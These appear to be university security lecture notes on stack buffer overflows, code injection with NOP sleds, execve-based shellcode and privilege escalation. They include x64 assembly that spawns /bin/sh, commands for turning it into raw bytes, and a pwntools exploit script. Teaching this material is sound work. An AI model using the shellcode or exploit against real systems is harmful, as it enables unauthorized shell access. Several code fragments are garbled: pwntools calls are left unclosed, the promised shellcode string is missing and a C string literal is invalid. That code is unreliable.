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CS 465 Introduction to Security and Privacy

Shellcode and privilege escalation


  • introductions of two students

Key concepts

Basic buffer overflow

We have previously used a buffer overflow to overwrite the return address with an address of our choosing. For example, this could go into the code block to execute some functionality that was not intended. In our toy examples this code would print out a congratulations message or a flag, but a more dangerous piece of code might grant the user administrative privileges.

basic buffer overflow, overwriting the return address with a pointer into the code block

Injecting code onto the stack

A more advanced attack injects code onto the stack, then writes the return address to point to that code. The attack code could come before or after the return address. In case the return address doesn’t point exactly to the start of the injected code, the attacker can add a NOP sled in front of the code.

buffer overflow that injects code onto the stack

The injected code could execute:

  • cat /flag.txt in a CTF contest
  • /bin/sh if wanting to create a shell (which then lets the attacker execute any other command)

The execve() system call

The execve system call allows a program to transform itself into a new process — “stop running my program, and run this other program instead”. Never returns to the calling program unless an error occurred when creating the new process image.

#include <unistd.h>
int execve(const char *pathname, char *const _Nullable argv[],
char *const _Nullable envp[]);
  • pathname is the path to a binary executable
  • argv is an array of arguments for the program
  • envp is an array of environment variables of the form key=value

Your shell might use this to start a program when you type a command at the prompt:

char *name[2];
name[0] = "curl";
name[1] = '';
execve("/usr/bin/curl", name, NULL);


When an attacker injects code, it is really useful to have that code spawn a shell. They can do this using execve to start /bin/sh. To write shellcode:

  • write assembly to launch the shell
  • compile this into a binary
  • extract the raw bytes to use for injection

Here is some example shellcode for the x64 architecture:

.global _start
.intel_syntax noprefix
mov rax, 59 ; choose which syscall: execve (see
lea rdi, [rip+binsh] ; set a *pointer* to the /bin/sh string as 1st argument
mov rsi, 0 ; set 2nd argument (argv[]) to NULL
mov rdx, 0 ; set 3rd argument (envp[]) to NULL
syscall ; perform the syscall we set up
.string "/bin/sh" ; include the string we referenced

You can then compile this and convert it to an ascii representation:

Terminal window
# compile
gcc -nostdlib -static shellcode.s -o shellcode-elf
# convert to raw
objcopy --dump-section .text=shellcode-raw shellcode-elf
# hexdump to ascii
hexdump -v -e '"\\" 1/1 "x%02x"' shellcode-raw; echo

This is the resulting string:


To complete the attack manually, you can use gdb to identify the address of the area where the code is located, using this to overwrite the return address.

Simplifying the attack

You can use pwntools to greatly simplify a buffer overflow attack. A video from CryptoCat walks through this process in detail. The script below shows the primary pieces of the attack.

# Offset to EIP (return address)
padding = 76
# Assemble the byte sequence for 'jmp esp' so we can search for it
# This finds a "jump esp" instruction that already exists in the binary, and points to the address of
# that instruction. The ESP will point to the memory location right after the return address, which
# is where you will put your payload.
jmp_esp = asm('jmp esp')
jmp_esp = next(
# shellcode to run /bin/sh
shellcode = asm(
# you could alternatively have shellcode to print the flag
# shellcode = asm('flag.txt'))
# Build payload
payload = flat(
asm('nop') * padding,
asm('nop') * 16,
# Write payload to file to use later
write("payload", payload)
# Exploit
io.sendlineafter(b':', payload)
# Get flag/shell

Privilege escalation

Privilege escalation occurs any time an attacker is able to increase their privileges. For example:

  • moving from existing program functionality to running a shell
  • moving from a sandbox to the entire filesystem
  • moving from a non-root account to a root account
  • moving from user space privileges to kernel-mode privileges

Our shellcode examples fall under the first category.

Additional reading